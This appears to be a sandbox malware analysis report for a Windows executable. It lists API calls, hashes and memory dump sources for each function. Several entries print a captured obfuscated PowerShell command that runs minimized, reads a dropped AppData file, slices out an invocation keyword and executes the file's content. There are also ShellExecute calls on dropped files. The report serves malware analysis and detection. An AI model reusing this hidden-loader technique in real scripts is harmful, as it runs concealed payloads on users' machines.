Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ca8852c6a58b64f8378a0d1c7197c8df105657e20cc6a0d4183a5da649b504f
Instruction ID: 46e89f5986d2092b55afe70fa6685d9fa399791e8108fb818b391c00f2395523
Opcode Fuzzy Hash: 5ca8852c6a58b64f8378a0d1c7197c8df105657e20cc6a0d4183a5da649b504f
Instruction Fuzzy Hash: DB7134B1D00228CFDF24CFA8C9547ADBBB1FB48305F15816AE816BB281D7385A96DF45

Function 00406688 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b7285504dc25ebea62f348072f1f3953958a79e977259425cfc79aacb6983c9
Instruction ID: 5e67b4a66f05046138c2ae5a0676b57ce30197662a7df0c6b5261f8fe412ade3
Opcode Fuzzy Hash: 7b7285504dc25ebea62f348072f1f3953958a79e977259425cfc79aacb6983c9
Instruction Fuzzy Hash: 22713471E00228CBDF28CFA8C854BADBBB1FB44305F15816ED816BB291D7385A96DF45

Function 004065D4 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3b74398c38f172e1519338bca71769cfe788df72e053bc328fcfef0089e390
Instruction ID: 362732d661397dfbd4d13a455e5b242d3c248a06ae4e9e58d05d54b49be68c20
Opcode Fuzzy Hash: 7c3b74398c38f172e1519338bca71769cfe788df72e053bc328fcfef0089e390
Instruction Fuzzy Hash: E7714671E00228CBDF28CF98C854BADBBB1FB44305F15816EE816BB291D7386A56DF45

Function 00402F1F Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
WriteFile.KERNELBASE(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,00000004,00000004,00000000,00000000,?,?), ref: 00402FD2

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: b34524b006225fd86995ffc18ec7893ffd6bb3b8ae62ae05747d43261111392a
Instruction ID: 299fc1a8812a7dc38163d95f9210b7a7d751e7dd8a0fa05609209fb9265a90e4
Opcode Fuzzy Hash: b34524b006225fd86995ffc18ec7893ffd6bb3b8ae62ae05747d43261111392a
Instruction Fuzzy Hash: B2314871502259EFDF20DF59DE44A9E3BA8EF043A5F20403AF908E61D0D374DA41EBA9

Function 00401E32 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00404FDC: lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00000000,00000000), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) "), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

Part of subcall function 004054A4: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00421500,Error launching installer), ref: 004054C9
Part of subcall function 004054A4: CloseHandle.KERNEL32(?), ref: 004054D6

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: 6a5de7a37bb700338687ddac31e5bfd3191d7f94f57ef416233b19e3b48e67ff
Instruction ID: 0e472d9888b0de42699340f3058b26b535eb6e7fa7af9e3b9e30c9644b91f742
Opcode Fuzzy Hash: 6a5de7a37bb700338687ddac31e5bfd3191d7f94f57ef416233b19e3b48e67ff
Instruction Fuzzy Hash: 92016D31904114FBCF11AFA1CD459AE7B71EB00345F10847BEA01B51E1C3784A81EBAA

Function 00405BD8 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,00405E1D,00000000,00000002,?,00000002,?,?,00405E1D,80000002,Software\Microsoft\Windows\CurrentVersion,?,004226A0,?), ref: 00405C01
RegQueryValueExA.KERNELBASE(?,?,00000000,00405E1D,?,00405E1D), ref: 00405C22
RegCloseKey.KERNELBASE(?), ref: 00405C43

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
Instruction ID: a34a41eefb499e4b528ee0e15ee2ddc390ed289ee56622bd58176e85d3ab8876
Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
Instruction Fuzzy Hash: 05015A7114520EEFEB228F64EC45AEB3FACEF15358F004036F944A6220D235D964CBA5

Function 0040243A Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 0040247B
RegCloseKey.KERNELBASE(?,?,?,%machinates%\vatter\udkastelses.Bss116,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: eed3c90d5c7e348fca0c4a701ef40ffaeb7a435824ebab2efc96f61ffb84ef12
Instruction ID: 09a8887cd5e4729410dcfabe5c46d2a670465c21522258ca6cdcbf1033b2090e
Opcode Fuzzy Hash: eed3c90d5c7e348fca0c4a701ef40ffaeb7a435824ebab2efc96f61ffb84ef12
Instruction Fuzzy Hash: E8F08671904204FFD7119F659D8CEBF7A6CEB40748F10453EF441B62C0D6B95E41966A

Function 00401DD8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155,?), ref: 00401E1E

Strings

C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155, xrefs: 00401E09

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155
API String ID: 587946157-4105336555
Opcode ID: 5b3355ea5905195ef51b073903dfe525f6ce29c1a6d67b87f90c054022239ed3
Instruction ID: 92cbb6ba42742382510c3a8e41a68a30635fa0dc9ae6a59fa4a75f74f7b170a3
Opcode Fuzzy Hash: 5b3355ea5905195ef51b073903dfe525f6ce29c1a6d67b87f90c054022239ed3
Instruction Fuzzy Hash: 8DF0F6B3B041047ACB41ABB59E4AE5D2BA4EB41718F240A3BF400F71C2DAFC8841F728

Function 004023C8 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F8
RegCloseKey.KERNELBASE(?,?,?,%machinates%\vatter\udkastelses.Bss116,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: cb37a1a76a93e2e641020109eab2c616a2fbad872fa47cbac7c87315435c727b
Instruction ID: 0332112a018d0e07836895fa5cafc858bad159e104d866fff78bcbb739cef185
Opcode Fuzzy Hash: cb37a1a76a93e2e641020109eab2c616a2fbad872fa47cbac7c87315435c727b
Instruction Fuzzy Hash: C111C171905205EFDB11DF60CA889BEBBB4EF00344F20843FE442B62C0D2B84A41EB6A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D

Function 004022C0 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DF
RegCloseKey.ADVAPI32(00000000), ref: 004022E8

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 8e6437201c4d01184a70f6be773875b8c7a361560ce53a8aacaaac3aabda72af
Instruction ID: 2c42072c31bcbbe471fcd7c214f11599c8a5ac898b8b604777345a29c8a948e9
Opcode Fuzzy Hash: 8e6437201c4d01184a70f6be773875b8c7a361560ce53a8aacaaac3aabda72af
Instruction Fuzzy Hash: 65F04F72A04111ABDB51ABB49A8EAAE6268AB40318F14453BF501B61C1DAFC5E01A66E

Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000), ref: 00401579
ShowWindow.USER32(00010426), ref: 0040158E

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: c64c6d1f079b89554086766a5c5b018e70a08e7419b7e9e5f4a1fba6667fe9af
Instruction ID: 8a385b190166ef4faee7ea7f7faf61a79327429c222f4cee9526e2a72d22cdd5
Opcode Fuzzy Hash: c64c6d1f079b89554086766a5c5b018e70a08e7419b7e9e5f4a1fba6667fe9af
Instruction Fuzzy Hash: 9FF0E577B08250BFC725CF64ED8086E77F5EB5531075444BFD102A3292C2B89D04DB18

Function 00405982 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\Nt8BLNLKN7.exe,80000000,00000003), ref: 00405986
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
Instruction ID: 21e5f81f3e52fa2c8f9e5bc24a994218dd140026ef3a1e453d479de883aad6ce
Opcode Fuzzy Hash: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
Instruction Fuzzy Hash: 94D09E31668301AFEF098F20DD16F2E7BA2EB84B00F10562CB682D40E0D6755815DB16

Function 0040595D Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,00405575,?,?,00000000,00405758,?,?,?,?), ref: 00405962
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405976

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
